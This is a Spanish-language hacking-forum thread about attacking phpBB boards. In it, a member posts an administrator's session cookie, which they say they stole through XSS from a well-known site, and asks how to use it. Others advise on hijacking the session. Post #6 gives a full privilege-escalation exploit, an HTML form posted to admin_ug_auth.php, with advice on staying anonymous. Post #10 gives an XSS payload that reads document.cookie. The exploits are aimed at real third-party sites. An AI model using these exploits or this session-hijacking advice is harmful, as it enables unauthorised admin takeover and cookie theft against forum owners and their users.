Resultados 1 al 10 de 10

Tema: Duda cookies en foros phpbb

  1. #1 Duda cookies en foros phpbb 
    Medio
    Fecha de ingreso
    Aug 2002
    Mensajes
    100
    Descargas
    0
    Uploads
    0
    Sabeis si en los foros phpbb se guarda en la cookie el pass del usuario??
    Esq tngo cierta cookie de un admin de un foro de phpbb (sacada por XSS) pero no se realmente usarla...

    He probado a cambiar la mia, poniendo la cookie del admin, pero al entrar en el foro, sigo saliendo yo como usuario....

    Se pueden desencriptar la cookie?

    Aki la teneis, sin la parte final que hace referencia al sitio dnd la saque (bastante importante y conocida la web ):

    -------------------

    phpbb2mysql_sid=215d1ec8809c864dcc821083f5f098bc;p hpbb2mysql_t=a%3A1%3A%7Bi%3A1037813838%3B%7D;phpbb 2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22% 3Bs%3A32%3A%220f97e6b84e72307bb0856277f7610b6%22%3 Bs%3A6%3A%22userid%22%3Bi%3A337%3B%7D
    victima.com/
    1024
    3563211904
    29601676
    3407782336
    29528259
    *
    --------------------------------



    En fin, necesito vuesta ayuda....
    Saludos
    "Quien se mete con el mejor muere como todos los demas" Zero Cool
    Citar  
     

  2. #2  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    bufff.....esq es una matada.

    supongo q esto phpbb2mysql_sid=215d1ec8809c864dcc821083f5f098bc;p es la direccion mysql del sitio encriptada

    y esto hpbb2mysql_t=a%3A1%3A%7Bi%3A1037813838%3B%7D;phpbb
    2......joer nose, la tabla?

    A partir de aqui la info del login.Parece encriptado con unicode , ese es el user: %22%3Bi%3A337%3B%7D

    mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%
    3Bs%3A32%3A%220f97e6b84e72307bb0856277f7610b6%22%3
    Bs%3A6%3A%22userid%22%3Bi%3A337%3B%7D
    victima.com/

    Supongo q a partir de aqui viene la pass encriptada.....pero ahora quien es el chulo q la desencripta XD. Con esa cookie metida en la carpeta de cookies te deja entrar como admin?? Intenta borrar antes todas las cookies excepto esta.
    1024
    3563211904
    29601676
    3407782336
    29528259
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  3. #3  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    Sobre Windows NT/2K/XP y cookies. Como dato, te digo que en estos sistemas, la cookie pilla este nombre: usuariodewin@nombrecookie.
    Si tu usuario se llama pepe y la cookie que has pillao tiene el usuario juan, tendrás que crearte el usuario juan o probar a cambiar el nombre de juan por pepe.

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

  4. #4  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    no hace falta tanta historia, tansolo q seas el admin de tu propio sistema (tengo q preguntar algo? XD) y puedes manejar los archivos a tu libre albedrio.
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  5. #5  
    Avanzado
    Fecha de ingreso
    Oct 2002
    Ubicación
    Haciendo algún Flip por ahí...
    Mensajes
    330
    Descargas
    10
    Uploads
    0
    Yo solo observo
    "Hoy me escape por la windor... Gracias Billy!!!"
    Citar  
     

  6. #6  
    Medio
    Fecha de ingreso
    Apr 2002
    Ubicación
    BCN
    Mensajes
    85
    Descargas
    0
    Uploads
    0
    Bueno, no es bien bien la respuesta a tu pregunta, pero en los foros de phpbb 2.0 puedes obtener privilegios de administrador aprovechandote de un bug. Aqui os lo dejo:

    Este bug se basa en obtener permisos de Administrador (borrar, crear, editar foros y posts, ver stats, etc.) mediante un error de programacion en el fichero admin_ug_auth.php (el usado por el sistema para los permisos).

    DATOS NECESITADOS

    Para lograr los permisos de administrador necesitamos dos datos:

    1.- EL lugar donde se encuentra instalado el phpBB, generalmente http://www.sitioafectado.com/phpBB/, si utilizamos un poquito de logica cada quien sabra donde esa.

    2.- Necesitas estar registrado (Es bueno crear un cuenta nueva, que no te vincule de ninguna manera y utilizar proxies). Suponiendo que ya te has registrado vas a la lista de miembros (hay un link en el foro en las cabeceras que dice MemberList si el foro esta en ingles o Miembros si esta en espanol) y localizas tu Nombre de Usuario, luego le haces clic y en la pagina que se abrira te fijas en tu barra de direcciones y veras que al final de ella un numero, este sera tu numero de usuario.

    Ej.: http://www.sitioafectado.com//phpBB2...profile&u=5384

    En este ejemplo el 5384 seria tu numero de usuario.

    VAMOS A ACTUAR

    Ahora tendremos que crear un archivo HTML localmente.

    Escribes este codigo en Notepad (windows) o en Kate o Kwrite {Linux}

    #html>
    #head>
    #/head>
    #body>
    #form method="post"
    action="http://www.sitioafectado.com/directorio_del_phpbb/admin/admin_ug_auth.php">
    Nivel de Usuario: #select name="userlevel">
    #option value="admin">Administrador#/option>
    #option value="user">Usuario#/option>#/select>
    #input type="hidden" name="private[1]" value="0">
    #input type="hidden" name="moderator[1]" value="0">
    #input type="hidden" name="mode" value="user">
    #input type="hidden" name="adv" value="">
    Numero de Usuario: #input type="text" name="u" size="5">
    #input type="submit" name="IR" value="IR">
    #/form>
    #center>#p> Script obtenido de SecurityBugWare. Modificado#br>
    y traducido al castellano por SuEn#/p>#/center>
    #/body>
    #/html>

    NOTA: Para que esto funcione tienes que sustituir los "#" por "<".

    Tienes que saber que tienes que modificar la direccion que te he puesto de ejemplo en el codigopor la direccion original del sitio afectado y el directorio del phpBB.

    Lo guardamos con el nombre que quieras pero con la extension .html. Luego lo abrimos con un explorador web (Mozilla, Konkeror, Iexplore, Netscape, etc.) y veras que te aparece un formulario donde se te pide el el numero de usuaio (el que obtuvimos mas arriba), lo introduces y haces clic donde dice IR.

    Veremos que nos aparece la pagina afectada con y un formulario de login, aqui no tienes que introducir tu nombrbe de usuario ni nada, tenemos que hacer clic donde dice login en la cabecera del foro, y en la pagina que se carga introducimos nuestro nombre de usuario y password.

    Ahora te aparece el indice del foro, al final del foro veremos que nuestro nick esta de color NARANJA (generelamente), eso indica que ya tenemos los permisos de administracion.

    Para probar esto, nos dirijimos a uno de los foros, hacemos clic en un post y hacemos clic en el boton de "Edit" para modificar un mensaje, escribimos lo que sea y le damos a Submit y si todo a funcionado veremos que el post se ha modificado.

    Ya eres administrador.
    Citar  
     

  7. #7  
    Medio
    Fecha de ingreso
    Aug 2002
    Mensajes
    100
    Descargas
    0
    Uploads
    0
    Ese bug ya lo sabia (esta en mi foro) y por mas que lo he probado en foros phpbb 2.0.0 (google ----> "powered by phpbb 2.0.0") no funciona.

    El bug que he utilizado para los foros phpbb acaba de salir en el bugtraq (tse tse, lo tienes que haber leido) y al probarlo, a la primera funciono, en un phpbb 2.0.6 (creo).

    AL final tndre que desencriptar la cookie, parece que son caracteres Unicode (gracias Crackzme)

    Un saludo
    Saludos
    "Quien se mete con el mejor muere como todos los demas" Zero Cool
    Citar  
     

  8. #8  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    si sacas algo nos lo cuentas
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  9. #9  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    Rojodos te refieres a esto?
    http://www.rootsecure.net/index.pl?m...m=exploit_code

    A mí me ha funcionado en la mayoría de sitios.

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

  10. #10  
    Medio
    Fecha de ingreso
    Aug 2002
    Mensajes
    100
    Descargas
    0
    Uploads
    0
    Nop, ese no es


    Es a traves de XSS:

    Aki va:

    -----------------------------------------------
    Vulnerable systems:

    The Last version of phpbb

    Exploit:

    http://phpbb.com/phpBB/viewtopic.php?

    t=17071&highlight=">"<Scr*ipt>javascript:alert(doc ument.cookie)</Scr*ipt>



    (without "*")


    -------------------------------------

    Vas a un post que haya puesto el moderador y ya tienes so cookie....


    Saludos
    "Quien se mete con el mejor muere como todos los demas" Zero Cool
    Citar  
     

Temas similares

  1. Respuestas: 5
    Último mensaje: 16-02-2010, 15:09
  2. MANUAL - Defacing foros PHPBB "2.0.x" By RaKi0N
    Por RaKi0N en el foro VULNERABILIDADES
    Respuestas: 5
    Último mensaje: 20-04-2008, 12:11
  3. Más PhpBB
    Por KaLPo en el foro VULNERABILIDADES
    Respuestas: 9
    Último mensaje: 03-04-2007, 13:24
  4. PHPbb 2.0.6
    Por Prakata en el foro INTRUSION
    Respuestas: 0
    Último mensaje: 02-07-2004, 03:08
  5. cookies en phpbb
    Por jocanor en el foro INGENIERIA INVERSA
    Respuestas: 4
    Último mensaje: 14-10-2003, 19:37

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •